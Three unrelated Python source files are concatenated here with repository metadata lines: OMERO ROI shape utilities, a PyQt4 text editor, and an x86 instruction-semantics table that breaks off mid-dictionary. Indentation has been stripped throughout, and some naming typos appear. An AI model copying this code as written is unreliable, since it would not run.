# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# ------------------------------------------------------------------------------
###
#
# ROIUtils allows the mapping of omero.model.ROIDataTypesI to python types
# and to create ROIDataTypesI from ROIUtil types.
# These methods also implement the acceptVisitor method linking to
# the ROIDrawingCanvas.
#
#
# @author Jean-Marie Burel
# <a href="mailto:j.burel@dundee.ac.uk">j.burel@dundee.ac.uk</a>
# @author Donald MacDonald
# <a href="mailto:donald@lifesci.dundee.ac.uk">donald@lifesci.dundee.ac.uk
# </a>
# @version 3.0
# <small>
# (<b>Internal version:</b> $Revision: $Date: $)
# </small>
# @since 3.0-Beta4
#
from omero.model.enums import UnitsLength
from omero.model import LengthI
from omero.model import EllipseI
from omero.model import LineI
from omero.model import RectangleI
from omero.model import PointI
from omero.model import PolylineI
from omero.model import PolygonI
from omero.model import MaskI
from omero.rtypes import rdouble, rint, rstring
#
# HELPERS
#
def pointsStringToXYlist(string):
"""
Method for converting the string returned from
omero.model.ShapeI.getPoints() into list of (x,y) points.
E.g: "points[309,427, 366,503, 190,491] points1[309,427, 366,503,
190,491] points2[309,427, 366,503, 190,491]"
or the new format: "309,427 366,503 190,491"
"""
pointLists = string.strip().split("points")
if len(pointLists) < 2:
if len(pointLists) == 1 and pointLists[0]:
xys = pointLists[0].split()
xyList = [tuple(map(int, xy.split(','))) for xy in xys]
return xyList
msg = "Unrecognised ROI shape 'points' string: %s" % string
raise ValueError(msg)
firstList = pointLists[1]
xyList = []
for xy in firstList.strip(" []").split(", "):
x, y = xy.split(",")
xyList.append((int(x.strip()), int(y.strip())))
return xyList
def xyListToBbox(xyList):
"""
Returns a bounding box (x,y,w,h) that will contain the shape
represented by the XY points list
"""
xList, yList = [], []
for xy in xyList:
x, y = xy
xList.append(x)
yList.append(y)
return (min(xList), min(yList), max(xList)-min(xList),
max(yList)-min(yList))
#
# Data implementation
#
##
# abstract, defines the method that call it as abstract.
#
#
def abstract():
import inspect
caller = inspect.getouterframes(inspect.currentframe())[1][3]
raise NotImplementedError(caller + ' must be implemented in subclass')
##
# ShapeSettingsData contains all the display information about
# the ROI that aggregates it.
#
class ShapeSettingsData:
##
# Initialises the default values of the ShapeSettings.
# Stroke has default colour of darkGrey
# StrokeWidth defaults to 1
#
def __init__(self):
self.WHITE = 16777215
self.BLACK = 0
self.GREY = 11184810
self.strokeColour = rint(self.GREY)
self.strokeWidth = LengthI()
self.strokeWidth.setValue(1)
self.strokeWidth.setUnit(UnitsLength.POINT)
self.strokeDashArray = rstring('')
self.fillColour = rint(self.GREY)
self.fillRule = rstring('')
##
# Applies the settings in the ShapeSettingsData to the ROITypeI
# @param shape the omero.model.ROITypeI that these settings will
# be applied to
#
def setROIShapeSettings(self, shape):
shape.setStrokeColor(self.strokeColour)
shape.setStrokeWidth(self.strokeWidth)
shape.setStrokeDashArray(self.strokeDashArray)
shape.setFillColor(self.fillColour)
shape.setFillRule(self.fillRule)
##
# Set the Stroke settings of the ShapeSettings.
# @param colour The colour of the stroke.
# @param width The stroke width.
#
def setStrokeSettings(self, colour, width=1):
self.strokeColour = rint(colour)
self.strokeWidth = LengthI()
self.strokeWidth.setValue(width)
self.strokeWidth.setUnit(UnitsLength.POINT)
###
# Set the Fill Settings for the ShapeSettings.
# @param colour The fill colour of the shape.
def setFillSettings(self, colour):
self.fillColour = rstring(colour)
##
# Get the stroke settings as the tuple (strokeColour, strokeWidth).
# @return See above.
#
def getStrokeSettings(self):
return (self.strokeColour.getValue(), self.strokeWidth.getValue())
##
# Get the fill setting as a tuple of (fillColour)
# @return See above.
#
def getFillSettings(self):
return (self.fillColour.getValue())
##
# Get the tuple ((stokeColor, strokeWidth), (fillColour)).
# @return see above.
#
def getSettings(self):
return (self.getStrokeSettings(), self.getFillSettings())
##
# Set the current shapeSettings from the ROI roi.
# @param roi see above.
#
def getShapeSettingsFromROI(self, roi):
self.strokeColour = roi.getStrokeColor()
self.strokeWidth = roi.getStrokeWidth()
self.strokeDashArray = roi.getStrokeDashArray()
self.fillColour = roi.getFillColor()
self.fillRule = roi.getFillRule()
##
# This class stores the ROI Coordinate (Z,T).
#
class ROICoordinate:
##
# Initialise the ROICoordinate.
# @param z The z-section.
# @param t The timepoint.
def __init__(self, z=0, t=0):
self.theZ = rint(z)
self.theT = rint(t)
##
# Set the (z, t) for the roi using the (z, t) of the ROICoordinate.
# @param roi The ROI to set the (z, t) on.
#
def setROICoord(self, roi):
roi.setTheZ(self.theZ)
roi.setTheT(self.theT)
##
# Get the (z, t) from the ROI.
# @param See above.
#
def setCoordFromROI(self, roi):
self.theZ = roi.getTheZ()
self.theT = roi.getTheT()
##
# Interface to inherit for accepting ROIDrawing as a visitor.
# @param visitor The ROIDrawingCompoent.
#
class ROIDrawingI:
def acceptVisitor(self, visitor):
abstract()
##
# The base class for all ROIShapeData objects.
#
class ShapeData:
##
# Constructor sets up the coord, shapeSettings and ROI objects.
#
def __init__(self):
self.coord = ROICoordinate()
self.shapeSettings = ShapeSettingsData()
self.ROI = None
##
# Set the coord of the class to coord.
# @param See above.
#
def setCoord(self, coord):
self.coord = coord
##
# Set the ROICoordinate of the roi.
# @param roi See above.
#
def setROICoord(self, roi):
self.coord.setROICoord(roi)
##
# Set the Geometry of the roi from the geometry in ShapeData.
# @param roi See above.
#
def setROIGeometry(self, roi):
abstract()
##
# Set the Settings of the ShapeDate form the settings object.
# @param settings See above.
#
def setShapeSettings(self, settings):
self.shapeSettings = settings
##
# Set the Settings of the roi from the setting in ShapeData.
# @param roi See above.
#
def setROIShapeSettings(self, roi):
self.shapeSettings.setROIShapeSettings(roi)
##
# Accept visitor.
# @param visitor See above.
#
def acceptVisitor(self, visitor):
abstract()
##
# Create the base type of ROI for this shape.
#
def createBaseType(self):
abstract()
##
# Get the roi from the ShapeData. If the roi already exists return it.
# Otherwise create it from the ShapeData and return it.
# @return See above.
#
def getROI(self):
if(self.roi is not None):
return self.roi
self.roi = self.createBaseType()
self.setROICoord(self.roi)
self.setROIGeometry(self.roi)
self.setROIShapeSettings(self.roi)
return self.roi
##
# Set the shape settings object from the roi.
# @param roi see above.
#
def getShapeSettingsFromROI(self, roi):
self.shapeSettings.getShapeSettingsFromROI(roi)
##
# Set the ROICoordinate from the roi.
# @param roi See above.
#
def getCoordFromROI(self, roi):
self.coord.setCoordFromROI(roi)
##
# Set the Geometr from the roi.
# @param roi See above.
#
def getGeometryFromROI(self, roi):
abstract()
##
# Get all settings from the roi, Geomerty, Shapesettins, ROICoordinate.
# @param roi See above.
#
def fromROI(self, roi):
self.roi = roi
self.getShapeSettingsFromROI(roi)
self.getCoordFromROI(roi)
self.getGeometryFromROI(roi)
##
# The EllispeData class contains all the manipulation and create of EllipseI
# types.
# It also accepts the ROIDrawingUtils visitor for drawing ellipses.
#
class EllipseData(ShapeData, ROIDrawingI):
##
# Constructor for EllipseData object.
# @param roicoord The ROICoordinate of the object (default: 0,0)
# @param x The centre x coordinate of the ellipse.
# @param y The centre y coordinate of the ellipse.
# @param radiusX The major axis of the ellipse.
# @param radiusY The minor axis of the ellipse.
def __init__(self, roicoord=ROICoordinate(), x=0, y=0, radiusX=0,
radiusY=0):
ShapeData.__init__(self)
self.x = rdouble(x)
self.y = rdouble(y)
self.radiusX = rdouble(radiusX)
self.radiusY = rdouble(radiusY)
self.setCoord(roicoord)
##
# overridden, @See ShapeData#setROIGeometry
#
def setROIGeometry(self, ellipse):
ellipse.setTheZ(self.coord.theZ)
ellipse.setTheT(self.coord.theT)
ellipse.setX(self.x)
ellipse.setY(self.y)
ellipse.setRadiusX(self.radiusX)
ellipse.setRadiusY(self.radiusY)
##
# overridden, @See ShapeData#getGeometryFromROI
#
def getGeometryFromROI(self, roi):
self.x = roi.getX()
self.y = roi.getY()
self.radiusX = roi.getRadiusX()
self.radiusY = roi.getRadiusY()
##
# overridden, @See ShapeData#createBaseType
#
def createBaseType(self):
return EllipseI()
##
# overridden, @See ShapeData#acceptVisitor
#
def acceptVisitor(self, visitor):
visitor.drawEllipse(
self.x.getValue(), self.y.getValue(), self.radiusX.getValue(),
self.radiusY.getValue(), self.shapeSettings.getSettings())
##
# The RectangleData class contains all the manipulation and creation of
# RectangleI types.
# It also accepts the ROIDrawingUtils visitor for drawing rectangles.
#
class RectangleData(ShapeData, ROIDrawingI):
##
# Constructor for RectangleData object.
# @param roicoord The ROICoordinate of the object (default: 0,0)
# @param x The top left x - coordinate of the shape.
# @param y The top left y - coordinate of the shape.
# @param width The width of the shape.
# @param height The height of the shape.
def __init__(self, roicoord=ROICoordinate(), x=0, y=0, width=0, height=0):
ShapeData.__init__(self)
self.x = rdouble(x)
self.y = rdouble(y)
self.width = rdouble(width)
self.height = rdouble(height)
self.setCoord(roicoord)
##
# overridden, @See ShapeData#setGeometry
#
def setGeometry(self, rectangle):
rectangle.setTheZ(self.coord.theZ)
rectangle.setTheT(self.coord.theT)
rectangle.setX(self.x)
rectangle.setY(self.y)
rectangle.setWidth(self.width)
rectangle.setHeight(self.height)
##
# overridden, @See ShapeData#getGeometryFromROI
#
def getGeometryFromROI(self, roi):
self.x = roi.getX()
self.y = roi.getY()
self.width = roi.getWidth()
self.height = roi.getHeight()
##
# overridden, @See ShapeData#createBaseType
#
def createBaseType(self):
return RectangleI()
##
# overridden, @See ShapeData#acceptVisitor
#
def acceptVisitor(self, visitor):
visitor.drawRectangle(
self.x, self.y, self.width, self.height,
self.shapeSettings.getSettings())
##
# The LineData class contains all the manipulation and create of LineI
# types.
# It also accepts the ROIDrawingUtils visitor for drawing lines.
#
class LineData(ShapeData, ROIDrawingI):
##
# Constructor for LineData object.
# @param roicoord The ROICoordinate of the object (default: 0,0)
# @param x1 The first x coordinate of the shape.
# @param y1 The first y coordinate of the shape.
# @param x2 The second x coordinate of the shape.
# @param y2 The second y coordinate of the shape.
def __init__(self, roicoord=ROICoordinate(), x1=0, y1=0, x2=0, y2=0):
ShapeData.__init__(self)
self.x1 = rdouble(x1)
self.y1 = rdouble(y1)
self.x2 = rdouble(x2)
self.y2 = rdouble(y2)
self.setCoord(roicoord)
##
# overridden, @See ShapeData#setGeometry
#
def setGeometry(self, line):
line.setTheZ(self.coord.theZ)
line.setTheT(self.coord.theT)
line.setX1(self.x1)
line.setY1(self.y1)
line.setX2(self.x2)
line.setY2(self.y2)
##
# overridden, @See ShapeData#getGeometryFromROI
#
def getGeometryFromROI(self, roi):
self.x1 = roi.getX1()
self.y1 = roi.getY1()
self.x2 = roi.getX2()
self.y2 = roi.getY2()
##
# overridden, @See ShapeData#createBaseType
#
def createBaseType(self):
return LineI()
##
# overridden, @See ShapeData#acceptVisitor
#
def acceptVisitor(self, visitor):
visitor.drawLine(
self.x1.getValue(), self.y1.getValue(), self.x2.getValue(),
self.y2.getValue(), self.shapeSettings.getSettings())
##
# The MaskData class contains all the manipulation and create of MaskI
# types.
# It also accepts the ROIDrawingUtils visitor for drawing masks.
#
class MaskData(ShapeData, ROIDrawingI):
##
# Constructor for MaskData object.
# @param roicoord The ROICoordinate of the object (default: 0,0)
# @param bytes The mask data.
# @param x The top left x - coordinate of the shape.
# @param y The top left y - coordinate of the shape.
# @param width The width of the shape.
# @param height The height of the shape.
def __init__(self, roicoord=ROICoordinate(), bytes=None,
x=0, y=0, width=0, height=0):
ShapeData.__init__(self)
self.x = rdouble(x)
self.y = rdouble(y)
self.width = rdouble(width)
self.height = rdouble(height)
self.bytesdata = bytes
self.setCoord(roicoord)
##
# overridden, @See ShapeData#setGeometry
#
def setGeometry(self, mask):
mask.setTheZ(self.coord.theZ)
mask.setTheT(self.coord.theT)
mask.setX(self.x)
mask.setY(self.y)
mask.setWidth(self.width)
mask.setHeight(self.height)
mask.setBytes(self.bytedata)
##
# overridden, @See ShapeData#getGeometryFromROI
#
def getGeometryFromROI(self, roi):
self.x = roi.getX()
self.y = roi.getY()
self.width = roi.getWidth()
self.height = roi.getHeight()
self.bytesdata = roi.getBytes()
##
# overridden, @See ShapeData#createBaseType
#
def createBaseType(self):
return MaskI()
##
# overridden, @See ShapeData#acceptVisitor
#
def acceptVisitor(self, visitor):
visitor.drawMask(
self.x.getValue(), self.y.getValue(),
self.width.getValue(), self.height.getValue(),
self.bytesdata, self.shapeSettings.getSettings())
##
# The PointData class contains all the manipulation and create of PointI
# types.
# It also accepts the ROIDrawingUtils visitor for drawing points.
#
class PointData(ShapeData, ROIDrawingI):
##
# Constructor for PointData object.
# @param roicoord The ROICoordinate of the object (default: 0,0)
# @param x The x coordinate of the shape.
# @param y The y coordinate of the shape.
def __init__(self, roicoord=ROICoordinate(), x=0, y=0):
ShapeData.__init__(self)
self.x = rdouble(x)
self.y = rdouble(y)
self.setCoord(roicoord)
##
# overridden, @See ShapeData#setGeometry
#
def setGeometry(self, point):
point.setTheZ(self.coord.theZ)
point.setTheT(self.coord.theT)
point.setX(self.x)
point.setY(self.y)
##
# overridden, @See ShapeData#getGeometryFromROI
#
def getGeometryFromROI(self, roi):
self.x = roi.getX()
self.y = roi.getY()
##
# overridden, @See ShapeData#createBaseType
#
def createBaseType(self):
return PointI()
##
# overridden, @See ShapeData#acceptVisitor
#
def acceptVisitor(self, visitor):
visitor.drawEllipse(
self.x.getValue(), self.y.getValue(), 3, 3,
self.shapeSettings.getSettings())
##
# The PolygonData class contains all the manipulation and create of PolygonI
# types.
# It also accepts the ROIDrawingUtils visitor for drawing polygons.
#
class PolygonData(ShapeData, ROIDrawingI):
##
# Constructor for PolygonData object.
# @param roicoord The ROICoordinate of the object (default: 0,0)
# @param pointList The list of points that make up the polygon,
# as pairs [x1, y1, x2, y2 ..].
def __init__(self, roicoord=ROICoordinate(), pointsList=(0, 0)):
ShapeData.__init__(self)
self.points = rstring(self.listToString(pointsList))
self.setCoord(roicoord)
##
# overridden, @See ShapeData#setGeometry
#
def setGeometry(self, polygon):
polygon.setTheZ(self.coord.theZ)
polygon.setTheT(self.coord.theT)
polygon.setPoints(self.points)
##
# overridden, @See ShapeData#getGeometryFromROI
#
def getGeometryFromROI(self, roi):
self.points = roi.getPoints()
##
# Convert a pointsList[x1,y1,x2,y2..] to a string.
# @param pointsList The list of points to convert.
# @return The pointsList converted to a string.
def listToString(self, pointsList):
string = ''
cnt = 0
for element in pointsList:
if(cnt != 0):
string = string + ','
cnt += 1
string = string + str(element)
return string
##
# Convert a string of points to a tuple list [(x1,y1),(x2,y2)..].
# @param pointString The string to convert.
# @return The tuple list converted from a string.
def stringToTupleList(self, pointString):
elements = []
list = pointString.split(',')
numTokens = len(list)
for tokenPair in range(0, numTokens / 2):
elements.append(
(int(list[tokenPair * 2]), int(list[tokenPair * 2 + 1])))
return elements
##
# overridden, @See ShapeData#createBaseType
#
def createBaseType(self):
return PolygonI()
##
# overridden, @See ShapeData#acceptVisitor
#
def acceptVisitor(self, visitor):
visitor.drawPolygon(self.stringToTupleList(
self.points.getValue()), self.shapeSettings.getSettings())
##
# The PolylineData class contains all the manipulation and create of PolylineI
# types.
# It also accepts the ROIDrawingUtils visitor for drawing polylines.
#
class PolylineData(ShapeData, ROIDrawingI):
##
# Constructor for PolylineData object.
# @param roicoord The ROICoordinate of the object (default: 0,0)
# @param pointList The list of points that make up the polygon,
# as pairs [x1, y1, x2, y2 ..].
def __init__(self, roicoord=ROICoordinate(), pointsList=(0, 0)):
ShapeData.__init__(self)
self.points = rstring(self.listToString(pointsList))
self.setCoord(roicoord)
##
# overridden, @See ShapeData#setGeometry
#
def setGeometry(self, point):
point.setTheZ(self.coord.theZ)
point.setTheT(self.coord.theT)
point.setPoints(self.points)
##
# overridden, @See ShapeData#getGeometryFromROI
#
def getGeometryFromROI(self, roi):
self.points = roi.getPoints()
##
# Convert a pointsList[x1,y1,x2,y2..] to a string.
# @param pointsList The list of points to convert.
# @return The pointsList converted to a string.
def listToString(self, pointsList):
string = ''
cnt = 0
for element in pointsList:
if(cnt > 0):
string = string + ','
string = string + str(element)
cnt += 1
return string
##
# Convert a string of points to a tuple list [(x1,y1),(x2,y2)..].
# @param pointString The string to convert.
# @return The tuple list converted from a string.
def stringToTupleList(self, pointString):
elements = []
list = pointString.split(',')
numTokens = len(list)
for tokenPair in range(0, numTokens / 2):
elements.append(
(int(list[tokenPair * 2]), int(list[tokenPair * 2 + 1])))
return elements
##
# overridden, @See ShapeData#createBaseType
#
def createBaseType(self):
return PolylineI()
##
# overridden, @See ShapeData#acceptVisitor
#
def acceptVisitor(self, visitor):
visitor.drawPolyline(self.stringToTupleList(
self.points.getValue()), self.shapeSettings.getSettings())
| dpwrussell/openmicroscopy | components/tools/OmeroPy/src/omero/util/ROI_utils.py | Python | gpl-2.0 | 22,495 |
# -*- coding: utf-8 -*-
#Ege Öz
from PyQt4 import QtCore, QtGui
import sys,os
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(661, 440)
icon = QtGui.QIcon.fromTheme(_fromUtf8("text"))
MainWindow.setWindowIcon(icon)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.gridLayout = QtGui.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.textEdit = QtGui.QTextEdit(self.centralwidget)
self.textEdit.setObjectName(_fromUtf8("textEdit"))
font = QtGui.QFont()
font.setFamily(_fromUtf8("Monospace"))
self.textEdit.setFont(font)
self.gridLayout.addWidget(self.textEdit, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 661, 20))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setObjectName(_fromUtf8("menuFile"))
self.menuHelp = QtGui.QMenu(self.menubar)
self.menuHelp.setObjectName(_fromUtf8("menuHelp"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.actionNew = QtGui.QAction(MainWindow)
self.actionNew.setObjectName(_fromUtf8("actionNew"))
self.actionOpen = QtGui.QAction(MainWindow)
self.actionOpen.setObjectName(_fromUtf8("actionOpen"))
self.actionSave = QtGui.QAction(MainWindow)
self.actionSave.setObjectName(_fromUtf8("actionSave"))
self.actionSaveAs = QtGui.QAction(MainWindow)
self.actionSaveAs.setObjectName(_fromUtf8("actionSaveAs"))
self.actionExit = QtGui.QAction(MainWindow)
self.actionExit.setObjectName(_fromUtf8("actionExit"))
self.actionAbout = QtGui.QAction(MainWindow)
self.actionAbout.setObjectName(_fromUtf8("actionAbout"))
self.menuFile.addAction(self.actionNew)
self.menuFile.addAction(self.actionOpen)
self.menuFile.addAction(self.actionSave)
self.menuFile.addAction(self.actionSaveAs)
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionExit)
self.menuHelp.addAction(self.actionAbout)
self.menubar.addAction(self.menuFile.menuAction())
self.menubar.addAction(self.menuHelp.menuAction())
self.actionExit.triggered.connect(self.exitt)
self.actionSave.triggered.connect(self.kaydet)
self.actionSaveAs.triggered.connect(self.fkaydet)
self.actionOpen.triggered.connect(self.ac)
self.actionAbout.triggered.connect(self.hakkinda)
self.actionNew.triggered.connect(self.yeni)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def hakkinda(self):
QtGui.QMessageBox.about(None, "About", "Ege Öz 2014")
def yeni(self):
self.textEdit.clear()
def ac(self):
self.afilename = QtGui.QFileDialog.getOpenFileName(None, "Open File", "",os.getenv("USER"))
f=open (self.afilename,"r")
data=f.read()
self.textEdit.setText(data)
f.close()
self.statusbar.showMessage("File opened.")
def kaydet(self):
f=open (self.afilename,"w")
f.write(self.textEdit.toPlainText())
f.close()
self.statusbar.showMessage("File saved.")
def fkaydet(self):
filename = QtGui.QFileDialog.getSaveFileName(None, "Save File", "",os.getenv("USER"))
data=self.textEdit.toPlainText()
f= open (filename,"w")
f.write(data)
f.close()
self.statusbar.showMessage("File saved.")
def exitt(self):
sys.exit()
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "TextPad", None))
self.menuFile.setTitle(_translate("MainWindow", "File", None))
self.menuHelp.setTitle(_translate("MainWindow", "Help", None))
self.actionNew.setText(_translate("MainWindow", "New", None))
self.actionOpen.setText(_translate("MainWindow", "Open", None))
self.actionSave.setText(_translate("MainWindow", "Save", None))
self.actionSaveAs.setText(_translate("MainWindow", "Save As", None))
self.actionExit.setText(_translate("MainWindow", "Exit", None))
self.actionAbout.setText(_translate("MainWindow", "About", None))
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
MainWindow = QtGui.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| egeoz/TextPad | textpad.py | Python | gpl-2.0 | 4,788 |
#!/usr/bin/env python2
##
## We define Instrution as two types "Computing instruction" and "Control Transfer instruction"
## for computing instruction
## "NAME" : [ Operand_Number , [ Formula_that_modify_reg ], [ FLAG_reg_modified]]
## for control transfter instruciton
## "NAME" : [ Operand_Number , [ Formula_that_modify_reg ], [ DST_Addr_on_condition]]
##
from capstone import *
from expression import Exp
from semantic import Semantic
from copy import deepcopy
class X86:
FLAG = ["CF", "PF", "AF", "ZF", "SF", "TF", "IF", "DF", "OF"]
regs64 = ["rax", "rbx", "rcx", "rdx", "rsi", "rdi", "rbp", "rsp", "r8", "r9", "r10", "r11", "r12",
"r13", "r14", "r15", "cs", "ds", "es", "fs", "gs", "ss"]
regs32 = ["eax", "ebx", "ecx", "edx", "cs", "ds", "es", "fs", "gs", "ss", "esi", "edi", "ebp", "esp", "eip"]
Tregs64 = {
"eax" : ["rax $ 0 : 31", "rax = ( rax $ 32 : 63 ) # eax", 32],
"ax" : ["rax $ 0 : 15", "rax = ( rax $ 16 : 63 ) # ax", 16],
"ah" : ["rax $ 8 : 15", "rax = ( rax $ 16 : 63 ) # ah # ( rax $ 0 : 7 )", 8],
"al" : ["rax $ 0 : 7", "rax = ( rax $ 8 : 63 ) # al", 8],
"ebx" : ["rbx $ 0 : 31", "rbx = ( rbx $ 32 : 63 ) # ebx", 32],
"bx" : ["rbx $ 0 : 15", "rbx = ( rbx $ 16 : 63 ) # bx", 16],
"bh" : ["rbx $ 8 : 15", "rbx = ( rbx $ 16 : 63 ) # bh # ( rbx $ 0 : 7 )", 8],
"bl" : ["rbx $ 0 : 7", "rbx = ( rbx $ 8 : 63 ) # bl", 8],
"ecx" : ["rcx $ 0 : 31", "rcx = ( rcx $ 32 : 63 ) # ecx", 32],
"cx" : ["rcx $ 0 : 15", "rcx = ( rcx $ 16 : 63 ) # cx", 16],
"ch" : ["rcx $ 8 : 15", "rcx = ( rcx $ 16 : 63 ) # ch # ( rcx $ 0 : 7 )", 8],
"cl" : ["rcx $ 0 : 7", "rcx = ( rcx $ 8 : 63 ) # cl", 8],
"edx" : ["rdx $ 0 : 31", "rdx = ( rdx $ 32 : 63 ) # edx", 32],
"dx" : ["rdx $ 0 : 15", "rdx = ( rdx $ 16 : 63 ) # dx", 16],
"dh" : ["rdx $ 8 : 15", "rdx = ( rdx $ 16 : 63 ) # dh # ( rdx $ 0 : 7 )", 8],
"dl" : ["rdx $ 0 : 7", "rdx = ( rdx $ 8 : 63 ) # dl", 8],
}
Tregs32 = {
"ax" : ["eax $ 0 : 15", "eax = ( eax $ 16 : 31 ) # ax", 16],
"ah" : ["eax $ 8 : 15", "eax = ( eax $ 16 : 31 ) # ah # ( eax $ 0 : 7 )", 8],
"al" : ["eax $ 0 : 7", "eax = ( eax $ 8 : 31 ) # al", 8],
"bx" : ["ebx $ 0 : 15", "ebx = ( ebx $ 16 : 31 ) # bx", 16],
"bh" : ["ebx $ 8 : 15", "ebx = ( ebx $ 16 : 31 ) # bh # ( ebx $ 0 : 7 )", 8],
"bl" : ["ebx $ 0 : 7", "ebx = ( ebx $ 8 : 31 ) # bl", 8],
"cx" : ["ecx $ 0 : 15", "ecx = ( ecx $ 16 : 31 ) # cx", 16],
"ch" : ["ecx $ 8 : 15", "ecx = ( ecx $ 16 : 31 ) # ch # ( ecx $ 0 : 7 )", 8],
"cl" : ["ecx $ 0 : 7", "ecx = ( ecx $ 8 : 31 ) # cl", 8],
"dx" : ["edx $ 0 : 15", "edx = ( edx $ 16 : 31 ) # dx", 16],
"dh" : ["edx $ 8 : 15", "edx = ( edx $ 16 : 31 ) # dh # ( edx $ 0 : 7 )", 8],
"dl" : ["edx $ 0 : 7", "edx = ( edx $ 8 : 31 ) # dl", 8],
}
# Instructions that modifty the execution path
Control = ["ret", "iret", "int", "into", "enter", "leave", "call", "jmp", "ja", "jae", "jb", "jbe", "jc", "je","jnc", "jne", "jnp", "jp", "jg", "jge", "jl", "jle", "jno", "jns", "jo", "js"]
insn = {
# data transfer
"mov": [2, ["operand1 = operand2"], []],
"cmove": [2, ["operand1 = ( ZF == 1 ) ? operand2 : operand1"], []],
"cmovne": [2, ["operand1 = ( ZF == 0 ) ? operand2 : operand1"], []],
"cmova": [2, ["operand1 = ( ( ZF == 0 ) & ( CF == 0 ) ) ? operand2 : operand1"], []],
"cmovae": [2, ["operand1 = ( CF == 0 ) ? operand2 : operand1"], []],
"cmovb": [2, ["operand1 = ( CF == 1 ) ? operand2 : operand1"], []],
"cmovbe": [2, ["operand1 = ( ( ZF == 1 ) | ( CF == 1 ) ) ? operand2 : operand1"], []],
"cmovg": [2, ["operand1 = ( ( ZF == 0 ) & ( SF == OF ) ) ? operand2 : operand1"], []],
"cmovge": [2, ["operand1 = ( SF == OF ) ? operand2 : operand1"], []],
"cmovl": [2, ["operand1 = ( SF != OF ) ? operand2 : operand1"], []],
"cmovle": [2, ["operand1 = ( ( ZF == 1 ) & ( SF != OF ) ) ? operand2 : operand1"], []],
"cmovs": [2, ["operand1 = ( SF == 1 ) ? operand2 : operand1"], []],
"cmovp": [2, ["operand1 = ( PF == 1 ) ? operand2 : operand1"], []],
"push": [1, ["* ssp = operand1"], []],
"pop": [1, ["operand1 = * ssp"], []],
#"movsx": [2, ["operand1 = operand2 > 0 ? operand2 : operand2 & 0xffffffffffffffff"], []],
#"movzx": [2, ["operand1 = 0 & operand2"], []],
# flag control instuctions
"stc": [0, [], ["CF = 1"]],
"clc": [0, [], ["CF = 0"]],
"cmc": [0, [], ["CF = ~ CF"]],
"cld": [0, [], ["DF = 0"]],
"std": [0, [], ["DF = 1"]],
"sti": [0, [], ["IF = 1"]],
"cli": [0, [], ["IF = 0"]],
# arithmetic
"xchg": [2, ["FIXME"], []],
"cmp": [2, ["temp = operand1 - operand2"], ["CF", "OF", "SF", "ZF", "AF", "PF"]],
"add": [2, ["operand1 = operand1 + operand2"], ["OF", "SF", "ZF", "AF", "CF", "PF"]],
"adc": [2, ["operand1 = operand1 + operand2 + CF"], ["OF", "SF", "ZF", "AF", "CF", "PF"]],
"sub": [2, ["operand1 = operand1 - operand2"], ["OF", "SF", "ZF", "AF", "CF", "PF"]],
"sbb": [2, ["operand1 = operand1 - operand2 - CF"], ["OF", "SF", "ZF", "AF", "CF", "PF"]],
"inc": [1, ["operand1 = operand1 + 1"], ["OF", "SF", "ZF", "AF", "PF"]],
"dec": [1, ["operand1 = operand1 - 1"], ["OF", "SF", "ZF", "AF", "PF"]],
"neg": [1, ["operand1 = - operand1"], ["CF", "OF", "SF", "ZF", "AF", "PF"]],
# control transfer
"ret": [1, [], ["* ssp"]],
"call": [1, [], ["* operand1"]],
"jmp": [1, [], ["* operand1"]],
"ja": [1, [], ["( ( CF == 0 ) & ( ZF == 0 ) ) ? * operand1 : 0"]],
"jae": [1, [], ["CF == 0 ? * operand1 : 0"]],
"jb": [1, [] , ["CF == 1 ? * operand1 : 0"]],
"jbe": [1, [] , ["( ( CF == 1 ) | ( ZF == 1 ) ) ? * operand1 : 0"]],
"jc": [1, [], ["CF == 1 ? * operand1 : 0"]],
"je": [1, [], ["ZF == 1 ? * operand1 : 0"]],
"jnc": [1, [], ["CF == 0 ? * operand1 : 0"]],
"jne": [1, [], ["ZF == 0 ? * operand1 : 0"]],
"jnp": [1, [], ["PF == 0 ? * operand1 : 0"]],
"jp": [1, [], ["PF == 1 ? * operand1 : 0"]],
"jg": [1, [], ["( ( ZF == 0 ) & ( SF == OF ) ) ? * operand1 : 0"]],
"jge": [1, [], ["SF == OF ? * operand1 : 0"]],
"jl": [1, [], ["SF != OF ? * operand1 : 0"]],
"jle": [1, [], ["( ( ZF == 1 ) | ( SF != OF ) ) ? * operand1 : 0"]],
"jno": [1, [], ["OF == 0 ? * operand1 : 0"]],
"jns": [1, [], ["SF == 0 ? * operand1 : 0"]],
"jo": [1, [], ["OF == 1 ? * operand1 : 0"]],
"js": [1, [], ["SF == 1 ? * operand1 : 0"]],
# logic
"and": [2, ["operand1 = operand1 & operand2"], ["CF = 0", "OF = 0", "SF", "ZF", "PF"]],
